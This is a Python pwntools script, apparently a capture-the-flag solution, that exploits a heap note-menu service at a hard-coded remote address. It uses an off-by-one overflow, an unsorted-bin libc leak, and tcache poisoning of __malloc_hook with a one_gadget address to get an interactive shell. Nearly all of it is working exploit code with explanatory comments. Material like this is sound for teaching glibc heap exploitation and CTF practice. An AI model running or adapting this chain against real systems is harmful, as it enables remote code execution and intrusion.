from pwn import *

# Full hexdumps of everything sent and received; useful while working out the
# heap layout, very noisy once the exploit is stable.
context(log_level='debug')

# Remote CTF instance this script was written against.
HOST, PORT = "121.36.194.21", 49153
r = remote(HOST, PORT)
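def New(index, size, tube=None):
    """Menu option 1: allocate a note of `size` bytes in slot `index`.

    All prompts are answered with bytes so the helper behaves the same on
    Python 2 and on Python 3 pwntools (mixing str and bytes is a TypeError
    on Python 3).

    Args:
        index: slot number the service stores the note under.
        size: requested size in bytes (presumably handed straight to malloc).
        tube: pwntools tube to drive; defaults to the module-level `r`, so a
            local `process()` can be substituted while debugging.
    """
    t = r if tube is None else tube
    t.sendlineafter(b"Your choice:", b'1')
    t.sendlineafter(b"Index:", str(index).encode())
    t.sendlineafter(b"Size:", str(size).encode())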
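def Edit(index, content, tube=None):
    """Menu option 2: overwrite the note in slot `index` with `content`.

    The last prompt is answered with `sendafter`, NOT `sendlineafter`: no
    newline is appended, so `content` is sent byte-for-byte. Callers that
    need the service to see a line terminator append `b'\\n'` themselves
    (the hook-overwrite payloads below do exactly that).

    Args:
        index: slot number to edit.
        content: raw payload bytes; passed through untouched so it may
            contain arbitrary binary (p8/p64 output).
        tube: pwntools tube to drive; defaults to the module-level `r`.
    """
    t = r if tube is None else tube
    t.sendlineafter(b"Your choice:", b'2')
    t.sendlineafter(b"Index:", str(index).encode())
    t.sendafter(b"Content:", content)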
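def Print(index, tube=None):
    """Menu option 3: return the raw bytes the service prints for slot `index`.

    Reads everything after "Content: " up to the next menu banner "1. New"
    and drops the final 7 bytes: the 6-byte banner plus the one byte
    (presumably a newline) printed just before it. The returned data is
    not padded or unpacked here; the leak code below does
    `u64(...ljust(8, b'\\x00'))`, which assumes the service's output stops
    at the pointer's leading NUL bytes.

    Args:
        index: slot number to print.
        tube: pwntools tube to drive; defaults to the module-level `r`.

    Returns:
        The printed note contents as bytes.
    """
    t = r if tube is None else tube
    t.sendlineafter(b"Your choice:", b'3')
    t.sendlineafter(b"Index:", str(index).encode())
    t.recvuntil(b"Content: ")
    return t.recvuntil(b"1. New")[:-7]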
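def Remove(index, tube=None):
    """Menu option 4: free the note in slot `index`.

    Whether the service clears the slot pointer afterwards is not visible
    here; the exploit below relies on slot 2 still aliasing memory that has
    been re-allocated to slot 5, so presumably it does not.

    Args:
        index: slot number to free.
        tube: pwntools tube to drive; defaults to the module-level `r`.
    """
    t = r if tube is None else tube
    t.sendlineafter(b"Your choice:", b'4')
    t.sendlineafter(b"Index:", str(index).encode())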
# Stage 1: allocate and then free seven 0xd8-byte notes (0xe0-sized chunks).
# Seven is the per-bin tcache capacity, so this presumably fills the 0xe0
# tcache bin up front so that the later free of the enlarged chunk falls
# through to the unsorted bin instead of being cached — confirm against the
# target's glibc version.
for slot in range(10, 17):
    New(slot, 0xd8)
for slot in range(10, 17):
    Remove(slot)
# Stage 2: five adjacent 0x68-byte notes (0x70 chunks) in slots 0..4.
# Slots 0-2 are the ones the overflow below plays with; 3 and 4 keep the
# enlarged chunk away from the top chunk.
for slot in range(5):
    New(slot, 0x68)
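# Stage 3: one-byte overflow from slot 0 into the chunk behind it. Slot 0
# was requested with 0x68 bytes and this write is 0x69 bytes long, so the
# trailing 0xe1 presumably lands on the low byte of slot 1's size field,
# turning it into a 0xe0 chunk (PREV_INUSE set) that spans slots 1 and 2.
# bytes literals keep the concatenation working on Python 3 pwntools.
Edit(0, b'a' * 0x68 + p8(0xe1))

# Freeing the enlarged chunk should send it to the unsorted bin (its tcache
# bin was filled in stage 1). Re-requesting 0x68 bytes carves slot 1 back out
# of it and leaves the remainder — overlapping slot 2 — in the unsorted bin
# with fd/bk pointing into main_arena.
Remove(1)
New(1, 0x68)

# Leak: slot 2 now prints the remainder's fd pointer. Pad to 8 bytes before
# unpacking, since the output is presumably cut at the pointer's leading NULs.
leak = u64(Print(2).ljust(8, b'\x00'))

# Offset chain, kept as in the original: leak-8 (= main_arena+0x58, so the
# name "unsorted_bin" is only approximate), main_arena = leak-0x60,
# __malloc_hook = main_arena-0x10. That matches the glibc 2.27 (Ubuntu 18.04)
# layout where the unsorted-bin head is main_arena+0x60.
# NOTE(review): verify against the target's libc — any other glibc shifts
# every one of these constants.
unsorted_bin = leak - 8
main_arena = unsorted_bin - 88
malloc_hook = main_arena - 0x10
# Classic misaligned fake-chunk spot just below __malloc_hook; with tcache
# poisoning the size byte is presumably irrelevant, but 0x23 is also what
# the padding in the final Edit() assumes.
hack = malloc_hook - 0x23

log.success("unsorted bin => {}".format(hex(unsorted_bin)))
log.success("__malloc_hook addr => {}".format(hex(malloc_hook)))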
from SearchLibc import *

# Stage 4: identify the remote libc from the __malloc_hook address
# (presumably a libc-database style lookup keyed on its low bits) and
# resolve a one_gadget relative to the recovered base.
libc = SearchLibc("__malloc_hook", malloc_hook)
malloc_hook_off = libc.dump(['__malloc_hook'])
base = malloc_hook - malloc_hook_off
# NOTE(review): ogg() returns a single candidate; its register/stack
# constraints must hold at the __malloc_hook call site. If no shell appears,
# try the other one_gadget candidates for this libc.
ogg = base + libc.ogg()

log.success("hack addr => %s" % hex(hack))
log.success("one_gadget addr => %s" % hex(ogg))
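# Stage 5: tcache poisoning through the overlapping chunk. New(5, 0x68) is
# presumably served from the unsorted-bin remainder, so slots 5 and 2 alias
# the same memory; freeing slot 2 puts that chunk in the 0x70 tcache bin
# while slot 5 can still write into it (use-after-free via the stale index).
New(5, 0x68)
Remove(2)
# Overwrite the freed chunk's tcache `next` pointer with the fake chunk near
# __malloc_hook. Edit() sends raw bytes, hence the explicit b'\n'.
Edit(5, p64(hack) + b'\n')

# The first 0x70 request returns the poisoned chunk, the second returns
# `hack` itself — tcache next pointers are user pointers and (on the glibc
# this targets, presumably 2.27) are not validated. 0x23 bytes of padding
# therefore put p64(ogg) exactly on __malloc_hook.
New(8, 0x68)
New(9, 0x68)
Edit(9, b'a' * 0x23 + p64(ogg) + b'\n')

# Any further allocation goes through the hook -> one_gadget -> shell.
New(17, 0x30)
r.interactive()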